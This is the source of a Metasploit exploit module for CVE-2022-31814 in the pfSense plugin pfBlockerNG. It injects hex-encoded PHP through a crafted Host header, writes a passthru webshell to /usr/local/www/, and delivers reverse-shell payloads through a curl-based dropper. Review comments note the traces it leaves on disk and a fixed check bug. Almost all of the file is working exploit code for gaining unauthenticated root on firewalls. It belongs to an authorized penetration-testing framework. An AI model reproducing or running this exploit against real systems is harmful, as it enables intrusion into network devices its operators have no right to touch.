Path: blob/master/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
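##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2022-31814 (pfBlockerNG 2.1.4_26 and below).
#
# Footprint on the target, for anyone triaging a host this was run against
# (the 'Notes' hash below declares ARTIFACTS_ON_DISK and IOC_IN_LOGS):
# every injection request hits /pfblockerng/www/index.php with a crafted
# Host header, and two files are written under /usr/local/www/ — a
# short-lived test file by #check (unlinked only on a Vulnerable verdict)
# and the webshell itself by #upload_shell, which is registered with
# FileDropper so session cleanup removes it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  # Runs #check ahead of #exploit unless the operator disables AutoCheck.
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',
        'Description' => %q{
          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to
          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected
          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.
        },
        'Author' => [
          'IHTeam', # discovery
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'CVE', '2022-31814' ],
          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/'],
          [ 'EDB', '51032' ]
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        # NOTE(review): Name and Description say the result is root access,
        # yet 'Privileged' is false — confirm which is intended.
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_openssl'
              }
            }
          ],
          [
            'BSD Dropper',
            {
              'Platform' => 'bsd',
              'Arch' => [ARCH_X64],
              'Type' => :bsd_dropper,
              'CmdStagerFlavor' => [ 'curl' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DisclosureDate' => '2022-09-05',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        },
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )

    register_options(
      [
        OptString.new('WEBSHELL_NAME', [
          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil
        ])
      ]
    )
  end

  # Writes the webshell to /usr/local/www/<name>.php and records it for
  # cleanup. Sets @webshell_name and @parameter_name, which
  # #execute_command relies on, so this must run before any command is sent.
  def upload_shell
    print_status 'Uploading shell...'
    @webshell_name =
      if datastore['WEBSHELL_NAME'].blank?
        "#{Rex::Text.rand_text_alpha(8..16)}.php"
      else
        "#{datastore['WEBSHELL_NAME']}.php"
      end
    # Random POST parameter name so the dropped file is not usable by a
    # third party who merely guesses the file name.
    @parameter_name = Rex::Text.rand_text_alpha(4..12)
    print_status("Webshell name is: #{@webshell_name}")
    web_shell_contents = <<~EOF
      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');
    EOF
    # Hex-encode the PHP so it survives the Host header unchanged; the
    # target decodes it with dc before handing it to php.
    encoded_php = web_shell_contents.unpack('H*')[0].upcase
    send_request_raw(
      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
      'headers' => {
        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
      }
    )
    # No response is inspected here; WfsDelay is the only wait before the
    # shell is assumed to be in place.
    sleep datastore['WfsDelay']
    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")
  end

  # Vulnerability check: drop a randomly named marker file under
  # /usr/local/www/, fetch it back over HTTP, and unlink it if found.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is served back,
  #   Safe otherwise.
  def check
    test_file_name = Rex::Text.rand_text_alpha(4..12)
    test_file_content = Rex::Text.rand_text_alpha(4..12)
    test_injection = <<~EOF
      <?php echo file_put_contents('/usr/local/www/#{test_file_name}','#{test_file_content}');
    EOF
    encoded_php = test_injection.unpack('H*')[0].upcase
    send_request_raw(
      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
      'headers' => {
        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
      }
    )
    sleep datastore['WfsDelay']

    check_resp = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/#{test_file_name}")
    )
    # Anything other than a 200 that echoes the marker is treated as "not
    # exploitable". The original condition read `!check_resp.code == 200`;
    # `!` binds to `code` alone there, so that clause could never be true
    # and only the body comparison was actually enforced. `!=` is what was
    # meant.
    #
    # NOTE(review): on this early return the marker file is not unlinked, so
    # a host that wrote the file but failed to serve it keeps the artifact.
    if check_resp.nil? || check_resp.code != 200 || !check_resp.body.include?(test_file_content)
      return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.')
    end

    # Clean up test webshell "/usr/local/www/#{test_file_name}"
    clean_up_injection = <<~EOF
      <?php echo unlink('/usr/local/www/#{test_file_name}');
    EOF
    encoded_clean_up = clean_up_injection.unpack('H*')[0].upcase
    send_request_raw(
      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
      'headers' => {
        'Host' => "' *; echo '16i #{encoded_clean_up} P' | dc | php; '"
      }
    )
    Exploit::CheckCode::Vulnerable
  end

  # Sends one command to the uploaded webshell as a POST parameter.
  # Requires #upload_shell to have set @webshell_name and @parameter_name.
  #
  # @param cmd [String] command to run on the target
  # @param _opts [Hash] unused; present for the CmdStager interface
  # @return [Rex::Proto::Http::Response, nil] whatever send_request_cgi returns
  def execute_command(cmd, _opts = {})
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, @webshell_name),
      'headers' => {
        # NOTE(review): this looks like it was meant to be Content-Type
        # (the value is a media type, not an encoding). Presumably
        # send_request_cgi already sets Content-Type for 'vars_post', so the
        # line is likely redundant; left unchanged pending confirmation.
        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
      },
      'vars_post' => {
        @parameter_name.to_s => cmd
      }
    })
  end

  # Uploads the webshell, then delivers the selected target's payload
  # through it.
  def exploit
    upload_shell
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :bsd_dropper
      execute_cmdstager
    end
  end
end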